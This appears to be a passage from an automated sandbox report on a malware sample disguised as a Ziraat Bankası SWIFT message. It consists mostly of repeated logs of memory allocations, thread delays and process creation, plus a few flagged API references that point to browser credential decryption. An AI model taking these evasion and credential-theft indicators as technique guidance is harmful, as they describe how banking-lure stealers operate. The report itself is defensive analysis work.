                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeMemory allocated: 9FD0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeMemory allocated: AFD0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeMemory allocated: BFD0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeMemory allocated: 1110000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeMemory allocated: 2D00000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeMemory allocated: 1190000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeMemory allocated: 9050000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeMemory allocated: A050000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeMemory allocated: 8B50000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeMemory allocated: 8B50000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 599875Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 599765Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 599656Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 599547Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 599437Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 599328Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 599218Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 599109Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 599000Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 598890Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 598773Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 598656Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 598547Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 598435Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 598328Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 598218Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 598109Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 598000Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 597890Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 597763Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 597655Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 597547Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 597437Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 597328Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 597218Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 597109Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 597000Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 596890Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 596781Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 596671Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 596562Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 596453Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 596343Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 596234Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 596125Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 596015Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 595906Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 595797Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 595686Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 595559Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 595453Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 595341Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 595234Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 595125Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 595015Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 594905Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 594796Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 594686Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 594577Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeWindow / User API: threadDelayed 8235Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeWindow / User API: threadDelayed 1597Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeWindow / User API: foregroundWindowGot 1773Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 6552Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 7056Thread sleep time: -26747778906878833s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 7056Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 7056Thread sleep time: -599875s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 7056Thread sleep time: -599765s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 7056Thread sleep time: -599656s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 7056Thread sleep time: -599547s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 7056Thread sleep time: -599437s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 7056Thread sleep time: -599328s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 7056Thread sleep time: -599218s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 7056Thread sleep time: -599109s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 7056Thread sleep time: -599000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 7056Thread sleep time: -598890s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 7056Thread sleep time: -598773s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 7056Thread sleep time: -598656s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 7056Thread sleep time: -598547s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 7056Thread sleep time: -598435s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 7056Thread sleep time: -598328s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 7056Thread sleep time: -598218s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 7056Thread sleep time: -598109s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 7056Thread sleep time: -598000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 7056Thread sleep time: -597890s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 7056Thread sleep time: -597763s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 7056Thread sleep time: -597655s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 7056Thread sleep time: -597547s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 7056Thread sleep time: -597437s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 7056Thread sleep time: -597328s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 7056Thread sleep time: -597218s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 7056Thread sleep time: -597109s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 7056Thread sleep time: -597000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 7056Thread sleep time: -596890s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 7056Thread sleep time: -596781s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 7056Thread sleep time: -596671s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 7056Thread sleep time: -596562s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 7056Thread sleep time: -596453s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 7056Thread sleep time: -596343s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 7056Thread sleep time: -596234s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 7056Thread sleep time: -596125s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 7056Thread sleep time: -596015s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 7056Thread sleep time: -595906s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 7056Thread sleep time: -595797s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 7056Thread sleep time: -595686s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 7056Thread sleep time: -595559s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 7056Thread sleep time: -595453s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 7056Thread sleep time: -595341s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 7056Thread sleep time: -595234s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 7056Thread sleep time: -595125s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 7056Thread sleep time: -595015s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 7056Thread sleep time: -594905s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 7056Thread sleep time: -594796s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 7056Thread sleep time: -594686s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe TID: 7056Thread sleep time: -594577s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 599875Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 599765Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 599656Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 599547Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 599437Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 599328Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 599218Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 599109Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 599000Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 598890Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 598773Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 598656Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 598547Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 598435Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 598328Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 598218Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 598109Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 598000Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 597890Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 597763Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 597655Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 597547Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 597437Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 597328Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 597218Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 597109Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 597000Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 596890Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 596781Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 596671Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 596562Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 596453Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 596343Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 596234Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 596125Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 596015Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 595906Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 595797Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 595686Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 595559Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 595453Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 595341Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 595234Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 595125Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 595015Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 594905Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 594796Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 594686Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeThread delayed: delay time: 594577Jump to behavior
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4542736542.0000000007A30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4526506853.0000000000D58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_0111C168 LdrInitializeThunk,LdrInitializeThunk,5_2_0111C168
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                .NET source code references suspicious native API functions
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3704448.3.raw.unpack, UltraSpeed.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3704448.3.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3704448.3.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess created: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess created: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess created: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe"Jump to behavior
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q|
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q|C
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\#
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q<j$
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q|L
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q|&"
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]ql
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qty
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qk
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q|6
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q0R!
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qp
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q|1
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q8{
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qt
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q8y
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q8z
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q8w
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qx
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\G
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qD{#
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q|h
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q<(
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\E
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q<%
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\F
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q|d
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q<"
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q$[(
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q<.
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q8c
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\K
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q<+
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q|i
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q<)
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q<*
